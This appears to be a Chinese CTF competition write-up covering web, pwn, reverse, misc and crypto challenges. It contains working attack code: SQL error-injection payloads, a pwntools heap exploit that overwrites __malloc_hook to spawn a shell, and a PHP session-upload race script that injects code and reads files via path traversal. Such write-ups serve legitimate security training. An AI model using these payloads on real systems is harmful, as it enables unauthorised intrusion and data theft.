总榜62,东北赛区第三,打不过
easy_sql
登陆页面,sql注入
passwd处报错注入:
uname=admin&passwd=1') and updatexml(1,concat(0x7e,(select*from (select * from flag as a join flag as b using(id,no))as c),0x7e),1)#&Submit=%E7%99%BB%E5%BD%95
报错出字段,继续
uname=admin&passwd=1')||updatexml(1,((select `cb9704e8-dfcb-4feb-90c7-d84c92ef0062` from flag limit 0,1)),1)%23#&Submit=%E7%99%BB%E5%BD%95
easy_source
原题:https://r0yanx.com/2020/10/28/fslh-writeup/
直接访问;?rc=ReflectionMethod&ra=User&rb=q&rd=getDocComment
tiny traffic
开局流量包,直接导出全部内容
关键信息为
lag_warpper导出后没用,无视
先导出就是
把test和secret后缀改为br,解压导出内部内容
test的提取后内容
syntax = "proto3";
message PBResponse {
int32 code = 1;
int64 flag_part_convert_to_hex_plz = 2;
message data {
string junk_data = 2;
string flag_part = 1;
}
repeated data dataList = 3;
int32 flag_part_plz_convert_to_hex = 4;
string flag_last_part = 5;
}
message PBRequest {
string cate_id = 1;
int32 page = 2;
int32 pageSize = 3;
}
是proto3,推测利用这个对sercet进行加密,那么直接解密就好
把test重命名为pb.proto,直接运行
protoc –decode=PBResponse pb.proto < secret
获得结果
code: 200
flag_part_convert_to_hex_plz: 15100450
dataList {
flag_part: "e2345"
junk_data: "7af2c"
}
dataList {
flag_part: "7889b0"
junk_data: "82bc0"
}
flag_part_plz_convert_to_hex: 16453958
flag_last_part: "d172a38dc"
把非16进制的内容转换为hex就行了
最后拼接
CISCN{e66a22e23457889b0fb1146d172a38dc}
running_pixel
一个gif,观察每隔10帧的内容有所不同, 好像是被破损的一样,提取全部帧数
from PIL import Image
import os
gifFileName = 'running_pixel.gif'
im = Image.open(gifFileName)
pngDir = gifFileName[:-4]
os.mkdir(pngDir)
try:
while True:
current = im.tell()
im.save(pngDir+'/'+str(current)+'.png')
im.seek(current+1)
except EOFError:
pass
然后对照片进行图片模式改变,可以发现原来图片是p模式,改为rgb模式,发现图片中存在颜色不一致的地方,背景色为247,247,247,部分像素颜色为233,233,233,所以将颜色为233,233,233区块的位置尝试画出来,发现内容
脚本:
res = Image.new("L", (400,400), 255)
from PIL import Image
import time
for i in range(382):
img = Image.open(f"./running_pixel/{i}.png").convert("RGB")
for x in range(img.size[0]):
for y in range(img.size[1]):
p = img.getpixel((x,y))
if p == (233,233,233):#此颜色与背景白247,247,247非常相似,但是利用色彩工具即可识别,所以推测233,233,233为关键内容
res.putpixel((y,x), 0)
res.save(f"new-{i}.png")
截图输出,可以发现也是个类似gif,然后手动右键字符逐个出现,按顺序写即可
内容为:
12504D0F-9DE1-4B00-87A5-A5FDD0986A00
包上CISCN交不上,改为小写即可
CISCN{12504d0f-9de1-4b00-87a5-a5fdd0986a00}
pwny
菜单里面有读写俩功能,从内存读数据和写数据,写的话是文件描述符,首先利用两次写的能力给文件描述符去掉,这样就能从终端写入数据了,然后读bss上的stderr和data中的数据,泄露出libc和程序的基址,然后就可以打mallochook,利用输入的scanf会申请堆块getshell
from pwn import *
#p = process('./pwny')
p = remote('124.70.45.83', 23955)
def read():
p.recvuntil('Your choice: ')
p.sendline('1')
def write(content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Index:')
p.sendline(str(content))
def newread(index):
p.recvuntil('Your choice: ')
p.sendline('1')
p.recvuntil('Index:')
p.send(p64(index))
def pwn(index, content):
p.recvuntil('Your choice: ')
p.sendline('2')
p.recvuntil('Index:')
p.sendline(str(index))
p.send(content)
write(0x100)
write(0x100)
newread(0xfffffffffffffff5)
p.recvuntil(': ')
base = int(p.recv(12),16) - 0x202008
print(hex(base))
newread(0xfffffffffffffffc)
p.recvuntil(': ')
leak = int(p.recv(12),16)
libc = ELF('./libc-2.27.so')
libc_base = leak - libc.sym['_IO_2_1_stderr_']
print(hex(libc_base))
one_gadget = libc_base + 0x10a41c
bss = base + 0x202060
malloc_hook = libc_base + libc.sym['__malloc_hook']
malloc_index = (malloc_hook - bss)//8
realloc_index = (malloc_hook - 8 - bss)//8
pwn(realloc_index, p64(one_gadget))
t = libc_base+libc.symbols["realloc"]+4
pwn(malloc_index, p64(t))
p.sendlineafter(":", b"1"*0x600)
p.interactive()
glass
apkre。checkflag再native层,
输入了39位,然后与密钥进行rc4,并进行xor运算,最终验证,根据脚本反推即可
密文:aim:0xA3,0x1A,0xE3,0x69,0x2F,0xBB,0x1A,0x84,0x65,0xC2,0xAD,0xAD,0x9E,0x96,0x05,0x02,0x1F,0x8E,0x36,0x4F,0xE1,0xEB,0xAF,0xF0,0xEA,0xC4,0xA8,0x2D,0x42,0xC7,0x6E,0x3F,0xB0,0xD3,0xCC,0x78,0xF9,0x98,0x3F
脚本:
aim = [0xA3,0x1A,0xE3,0x69,0x2F,0xBB,0x1A,0x84,0x65,0xC2,0xAD,0xAD,0x9E,0x96,0x05,0x02,0x1F,0x8E,0x36,0x4F,0xE1,0xEB,0xAF,0xF0,0xEA,0xC4,0xA8,0x2D,0x42,0xC7,0x6E,0x3F,0xB0,0xD3,0xCC,0x78,0xF9,0x98,0x3F]
key = "12345678"
n_aim = []
i = 0
for i in range(40):
for j in range(len(key)):
for k in range(0,0x100):
if k ^ (ord(key[j])) == aim[i]:
n_aim.append(k)
print(n_aim)
break
i += 1
if i == 39:
break
aim = n_aim[:]
n_aim = []
for i in range(0,39,3):
flag = False
for a in range(0, 0x100):
for b in range(0, 0x100):
for c in range(0, 0x100):
if (a^c) == aim[i] and (b^c) == aim[i+2] and (b^(a^c)) == aim[i+1]:
print(f"{a} {b} {c}")
n_aim.append(a)
n_aim.append(b)
n_aim.append(c)
flag = True
if flag == True:
break
if flag == True:
break
if flag == True:
break
for i in n_aim:
print(str(hex(i))[2:], end=' ')
最后转rc4即可
隔空传话
二血,好耶
开局一堆加密通话,谷歌搜索关键字符串找到相关文章:
[合宙AT指令发送短信 Luat doc 社区文章静态页面 ] (luatos.wiki)
归根结底就是pdu短信的一个编码,那就找到网站,挨个行进行转换吧。。。
工具:
逐一操作,获得如下字符内容(手 工 带 师):
(截图往后都是十六进制,暂时先不管
从前两句可以知道这个意思是第一部分flag是前八个字符,但是后面的w465暂时就不知道是啥了
而且下面的十六进制数据丢入winhex可以发现有PNG的头
那说明数据肯定是经过了混淆,然后在逐一转换的过程中,注意到时间并非为线性顺序,而是乱序
此处是第一张图的段落在第二张图段落的前面,可是转换后的时间却不是,那说明需要进行转换,将数据按照时间顺序排序才可以
此处在github上pull一个脚本
tools/Misc/PCRT_PNG at f1542a2c1c0bf79b89a74f9cfffec2393c2e6ab3 · developer-hsm/tools (github.com)
该脚本可以将png的zlib直接进行修复,免去写时间然后排序的麻烦事(是非预期
直接binwalk前面的一堆16进制转好的原图
把zlib提取出,使用上述脚本
python2 PCRT.py -d 5B.zlib
即可恢复出完整数据,丢入winhex转换成图片即可
此处调整半天,crc爆破也没成,然后灵光一现,前面的哪个w465是不是代表的是宽度为465??
改一下宽度,获得图片
最后拼接flag
CISCN{15030442_b586_4c9e_b436_26def12293e4}
middle_source
进入,一个代码,提示flag在/etc下
网站有个.listing文件,(include特性)然后可以看见有个you_can_seeeeeeee_me.php
目录穿越直接访问
获得phpinfo,可以看见seession的一个路径,那实锤打session,
参考文章:https://www.plasf.cn/articles/d42c963778.html
exp :
import io
import requests
import threading
sessid = 'S3BABFKDMFSAFLL'
data = {"cmd":"system('cat flag.php');"}
def write(session):
while True:
f = io.BytesIO(b'a' * 1024 * 50)
resp = session.post('http://124.70.45.83:23753/',
data={'PHP_SESSION_UPLOAD_PROGRESS': '<?php scandir(readfile("/etc/chbdfhfefb/fbgfaeecad/cahcbiidcb/aejfhfffba/ecdiehbhab/fl444444g"));?>'},
files={'file': ('test.txt',f)},
cookies={'PHPSESSID': sessid} )#通过scandir('/etc')逐层寻找flag所在位置,嗯套
def read(session):
while True:
data={
'filed':'',
'cf':'../../../../../../var/lib/php/sessions/cfaefhcedg/sess_'+sessid
}
resp = session.post('http://124.70.45.83:23753/',data=data)
if 'test.txt' in resp.text:
print(resp.text)
event.clear()
else:
print("[+++++++++++++]retry")
if __name__=="__main__":
event=threading.Event()
with requests.session() as session:
for i in range(1,10):
threading.Thread(target=write,args=(session,)).start()
for i in range(1,10):
threading.Thread(target=read,args=(session,)).start()
event.set()
baby_bc
参考文章:
How to make llvm .bc file executable? – Stack Overflow
llc -filetype=obj my-file.bc
gcc my-file.o
./a.out
直接照着打就完事了
输出内容导入ida,可以看出这是个数独直接解就行了,然后填符合要求的0-5数字最后直接上z3爆破嗷
rowss = [[0x00, 0x00, 0x00, 0x01],[0x01, 0x00, 0x00, 0x00], [0x02, 0x00, 0x00, 0x01], [0x00, 0x00, 0x00, 0x00], [0x01, 0x00, 0x01, 0x00]]
colnms = [[0x00, 0x00, 0x02, 0x00,0x02], [0x00, 0x00, 0x00, 0x00, 0x00], [0x00, 0x00, 0x00, 0x01, 0x00], [0x00, 0x01, 0x00, 0x00, 0x01]]
from z3 import *
from hashlib import md5
s = Solver()
map = [[None]*5,[None]*5,[None]*5,[None]*5,[None]*5,]
for i in range(5):
for j in range(5):
map[i][j]=(Int("x%d%d"%(i, j)))
print(map)
s.add(map[2][2] == 4)
s.add(map[3][3] == 3)
for i in range(5):
for j in range(5):
s.add(map[i][j] >= 1)
s.add(map[i][j] <= 5)
for i in range(5):
for j in range(5):
for k in range(j):
s.add(map[i][j] != map[i][k])
for j in range(5):
for i in range(5):
for k in range(i):
s.add(map[i][j] != map[k][j])
for i in range(5):
for j in range(4):
if rowss[i][j] == 1:
s.add(map[i][j] > map[i][j+1])
elif rowss[i][j] == 2:
s.add(map[i][j] < map[i][j+1])
for i in range(4):
for j in range(5):
if colnms[i][j] == 2:
s.add(map[i][j] > map[i+1][j])
elif colnms[i][j] == 1:
s.add(map[i][j] < map[i+1][j])
answer = s.check()
if answer == sat:
print(s.model())
m = s.model()
flag = []
for i in map:
for j in i:
flag.append(m[j].as_long())
for i in range(len(flag)):
flag[i] += 0x30
flag[12] = 0x30
flag[18] = 0x30
flag = bytes(flag)
print(md5(flag).hexdigest())
move
较为简单的题,丢入sage跑就行了
A=matrix(ZZ,2,[2**512,0,67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809,80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281])
A = A.LLL()
B = A.transpose()
C = B.LLL()
C = -C
x = 0x3a19a367657a5c8ee46cebe63688f386eaaee9be4f57606584230eddcca53bb4#hex(C[0][0]>>512)
e = 67595664083683668964629173652731210158790440033379175857028564313854014366016864587830963691802591775486321717360190604997584315420339351524880699113147436604350832401671422613906522464334532396034178284918058690365507263856479304019153987101884697932619200538492228093521576834081916538860988787322736613809
n = 80263253261445006152401958351371889864136455346002795891511487600252909606767728751977033280031100015044527491214958035106007038983560835618126173948587479951247946411421106848023637323702085026892674032294882180449860010755423988302942811352582243198025232225481839705626921264432951916313817802968185697281
y = e*x//n
k = e*x-y*n
K = k//y
l,r = 0,K
for i in range(515):
s=(l+r)//2
v=s*s-int(s*s*9*(K-1-s)*(K-1-s))//(round(n**0.25)*round(n**0.25))
if v<4*n:
l=s
else:
r=s
pandq=r
d = inverse_mod(e,n+pandq+1)
Cx= 6785035174838834841914183175930647480879288136014127270387869708755060512201304812721289604897359441373759673837533885681257952731178067761309151636485456082277426056629351492198510336245951408977207910307892423796711701271285060489337800033465030600312615976587155922834617686938658973507383512257481837605
Cy= 38233052047321946362283579951524857528047793820071079629483638995357740390030253046483152584725740787856777849310333417930989050087087487329435299064039690255526263003473139694460808679743076963542716855777569123353687450350073011620347635639646034793626760244748027610309830233139635078417444771674354527028
b=(Cy**2-Cx**3)%n
E=EllipticCurve(Zmod(n), [0, b])
C=E(Cx,Cy)
P=d*C
print(P)
得到(1500537458076802315061673741609048809282155574 :293348288331056197202496342835702240774641366909 : 1) 然后将前两个longtobytes拼接得到flag:
CISCN{e91fef4ead7463b13d00bda65f540477}
robot
下载文件,谷歌搜索后缀,得知是Robotstudio的工程文件,在网络上下载后安装打开导入工程
类似工控题目,开启后直接仿真运行。
提示故障,这里经过搜索需要更改模式调整控制面板
进入示教器
更改手动模式
逐次进入:
编辑内容:
将此处选项全部改为yes后重启
再次仿真,即可正常启动
打开给的control
进行connect
通过在下面绘画,可以发现上面进行了绘制
观察右边数据,为三个坐标,那么打开流量包进行观察
是有特定的value值,且格式符合绘制格式,所以推测这就是绘制的关键,将其提取出后写脚本plot即可
脚本:
import re
from PIL import Image
RE = re.compile(r"Value\.\[(\d+),(\d+),(\d+)\]")
with open("value", 'r') as f:
data = f.read()
data = RE.findall(data)
img = Image.new("L", (400,400),0)
for i in data:
img.putpixel((int(i[0]), int(i[1])), 255)
img.save("value.png")
转为md5后提交即可
RSA
首先进来是小e攻击,然后是共模攻击,剩下的就是已知p高位攻击,嗯套
前面两个就很简单,第三个就先通过sage获取p和q
脚本:
p=0xda5f14bacd97f5504f39eeef22af37e8551700296843e536760cea761d334508003e01b886c0c600000000000000000000000000000000000000000000000000
n=0xa188aaaf75c79219462f0ba90b68cb6e0694b113c89b8006f3a54f6374bbc0d91fb83b15866d93fd74019e1e541edce6c06c012c76f41af516f5cc89f5f9984f4e626607632edec7139e5acc4a3f3f0dd90665d469fcf7c9226fb0fe275b6b2a776dac8d032c880eec9862fc9d6480fb9cd2ce3e65867eac7e52d4462fb501eb
f = x + p
kb = 200
PR.<x> = PolynomialRing(Zmod(n))
x0 = f.small_roots(X=2^kb, beta=0.4)[0]
print ("x: %s" %hex(int(x0)))
p = p+x0
print ("p: ", hex(int(p)))
assert n % p == 0
q = n/int(p)
print ("q: ", hex(int(q)))
然后对三个msg进行解密
代码:
from gmpy2 import *
import gmpy2
import hashlib
from Crypto.Util.number import long_to_bytes,bytes_to_long,getPrime
x1 = 0
y1 = 2
text = []
msg1 = text[:x1]
msg2 = text[x1:y1]
msg3 = text[y1:]
msg1 = bytes_to_long(msg1);msg2 = bytes_to_long(msg2);msg3 = bytes_to_long(msg3)
p1 = getPrime(512);q1 = getPrime(512)
N1 = p1*q1
p2 = getPrime(512);q2 = getPrime(512)
N2 = p2*q2
e1,e2,e3 = 3,17,65537
p3 = getPrime(512);q3 = getPrime(512)
N3 = p3*q3
enc1 = 19105765285510667553313898813498220212421177527647187802549913914263968945493144633390670605116251064550364704789358830072133349108808799075021540479815182657667763617178044110939458834654922540704196330451979349353031578518479199454480458137984734402248011464467312753683234543319955893
n = 123814470394550598363280518848914546938137731026777975885846733672494493975703069760053867471836249473290828799962586855892685902902050630018312939010564945676699712246249820341712155938398068732866646422826619477180434858148938235662092482058999079105450136181685141895955574548671667320167741641072330259009L
msg1,msg2,msg3 = ""
for j in range(130000000):
a, b = gmpy2.iroot(enc1 + j * n, 3)
if b == 1:
m = a
print('x {:x}'.format(m))
print("flag {}".format(long_to_bytes(m)))
msg1 = long_to_bytes(m)
break
n2 = 111381961169589927896512557754289420474877632607334685306667977794938824018345795836303161492076539375959731633270626091498843936401996648820451019811592594528673182109109991384472979198906744569181673282663323892346854520052840694924830064546269187849702880332522636682366270177489467478933966884097824069977L
e1 = 17
e2 = 65537
s = gcdext(e1, e2)
s1 = s[1]
s2 = -s[2]
c1 = 54995751387258798791895413216172284653407054079765769704170763023830130981480272943338445245689293729308200574217959018462512790523622252479258419498858307898118907076773470253533344877959508766285730509067829684427375759345623701605997067135659404296663877453758701010726561824951602615501078818914410959610
c2 = 91290935267458356541959327381220067466104890455391103989639822855753797805354139741959957951983943146108552762756444475545250343766798220348240377590112854890482375744876016191773471853704014735936608436210153669829454288199838827646402742554134017280213707222338496271289894681312606239512924842845268366950
c2 = invert(c2, n2)
msg2 = long_to_bytes((pow(c1,s1,n2) * pow(c2 , s2 , n2)) % n2)
p3 = 11437038763581010263116493983733546014403343859218003707512796706928880848035239990740428334091106443982769386517753703890002478698418549777553268906496423
q3 = 9918033198963879798362329507637256706010562962487329742400933192721549307087332482107381554368538995776396557446746866861247191248938339640876368268930589
enc3 = 59213696442373765895948702611659756779813897653022080905635545636905434038306468935283962686059037461940227618715695875589055593696352594630107082714757036815875497138523738695066811985036315624927897081153190329636864005133757096991035607918106529151451834369442313673849563635248465014289409374291381429646
e3 =
65537
n3 = 113432930155033263769270712825121761080813952100666693606866355917116416984149165507231925180593860836255402950358327422447359200689537217528547623691586008952619063846801829802637448874451228957635707553980210685985215887107300416969549087293746310593988908287181025770739538992559714587375763131132963783147L
ph3 = (p3-1)*(q3-1)
d3 = gmpy2.invert(e3,ph3)
msg3 = long_to_bytes(pow(enc3,d3,n3))
msg = msg1 + msg2 + msg3
md5 = hashlib.md5()
md5.update(msg)
print md5.hexdigest()
homo
密码题,一个同态加密的题目,参考文章:
(6条消息) 同态加密技术总结liyakai_cn的博客-CSDN博客同态加密
nc连进去后给了四个参数,结合给的代码可知
此处nc输出的内容依次对应公钥pk0,pk1和密文ct0,ct1
这里github上也有个脚本,以供参考
那么只需要通过攻击出私钥sk,然后再次进行对密文内容的解密即可
此处要进行堆积数据,也就是需要count200次以上才可以进行下面的使用选项2
当满足时然后才进行尝试解密功能,然后发送即可实现解密的效果,并且需要对c0与c1分别解密
根据上述,以及参考脚本可运算出私钥sk的值为01二进制组成,同理,推测结果也是由01进行组成。
(用参考脚本直接改将nc进去的数据手动输入也可以,但是数据过大就还是用远程方式节约一下资源了)
from copy import deepcopy
from pwn import *
import randcrack
import random
rc = randcrack.RandCrack()
context.log_level="debug"
p=remote('124.70.45.83',23580)
def recover_key(i):
cc0=pk0[:]
cc1=pk1[:]
cc0[i] += M
cc1[0] += M
return cc0, cc1
def recover_key(i):
cc0=pk0[:]
cc1=pk1[:]
cc0[i] += M
cc1[0] += M
return cc0, cc1
def f(c):
payload = str(c[0])
for i in range(1023):
payload += ','+str(c[i+1])
return payload
p.recvuntil("\n")
p.recvuntil("\n")
#save
c_0=eval(p.recvuntil("\n"))
c_1=eval(p.recvuntil("\n"))
c0=deepcopy(c_0)
c0[0]-=1
c1=deepcopy(c_1)
c1[0]+=1
p.recvuntil("2.decrypt")
p.sendline("1")
mask = (1 << 32) - 1
for i in range(312):
p.recvuntil("your number:")
p.sendline("1")
p.recvuntil("lose!my number is")
r = int(p.recvuntil("\n").decode().strip("\n"))
r1=r>>32
r2=r&mask
rc.submit(r2)
rc.submit(r1)
for i in range(200):
#decode
p.recvuntil("your number:")
m=rc.predict_randrange(0, 2 ** 64 - 1)
p.sendline(str(m))
p.sendline("2")
p.recvuntil("c0:")
p.sendline(",".join(str(strs) for strs in c0))
p.recvuntil("c1:")
p.sendline(",".join(str(strs) for strs in c1))
p.recvuntil("\n")
p.recvuntil("\n")
p.recvuntil("\n")
p.recvuntil("\n")
获得二进制数据,直接转换字符即可
- 最新
- 最热
只看作者